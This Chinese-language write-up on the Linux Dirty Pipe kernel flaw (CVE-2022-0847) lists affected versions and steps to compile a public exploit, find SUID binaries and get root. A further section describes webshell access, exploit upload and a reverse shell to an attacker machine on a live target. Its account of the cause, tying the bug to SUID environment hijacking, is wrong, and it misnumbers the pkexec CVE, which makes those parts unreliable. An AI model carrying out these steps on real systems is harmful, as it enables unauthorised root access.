0x00 漏洞概述

0x01 漏洞详情

３月７日，研究人员公开披露了Linux 内核中的一个权限提升漏洞（CVE-2022-0847，也称为“Dirty Pipe”），允许非特权用户注入和覆盖任意只读文件中的数据，导致权限提升，并最终获得root权限。该漏洞影响了 Linux Kernel 5.8 及更高版本，甚至影响了Android设备。

CVE-2022-0847漏洞类似于 2016 年修复的 Dirty COW 漏洞 (CVE-2016-5195)，但它更容易被利用，目前此漏洞的PoC/EXP已经发布。

0x02 影响范围

Linux Kernel 版本 >= 5.8

Linux Kernel 版本 < 5.16.11 / 5.15.25 /5.10.102

0x03 漏洞复现

在本地Kali提权

1、查看基本Linux系统信息

2、先将EXP这个C文件编译成二进制可执行文件

gcc -o exp dirtypipez.c
chmod +x exp

3、输入下面这三条命令中的任意一个

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

4、使用刚刚编译的exp

./exp /usr/bin/chsh

5、成功提权

实战环境下的提权

1、先获取webshell，进行信息收集，发现目标系统版本符合这个漏洞

2、上传c文件并且编译，然后使用find命令提权

可以看到，无效，这时候进行bash反弹shell到攻击机上

3、再次使用这些命令

4、成功提权

0x04 漏洞原理

暂时没有特别深入研究，目前只知道和环境劫持提权差不多

环境劫持提权

环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令

寻找suid文件

find / -perm -u=s -type f 2>/dev/null

0x04 总结

1、这次的提权，和之前的那个CVE-2021-3034 Linux pkexec提权类似，在实战过程中要先反弹shell到攻击机上，然后再使用提权命令

2、这次的提权使用到了find命令，也就是环境劫持提权，有兴趣可以继续研究一下。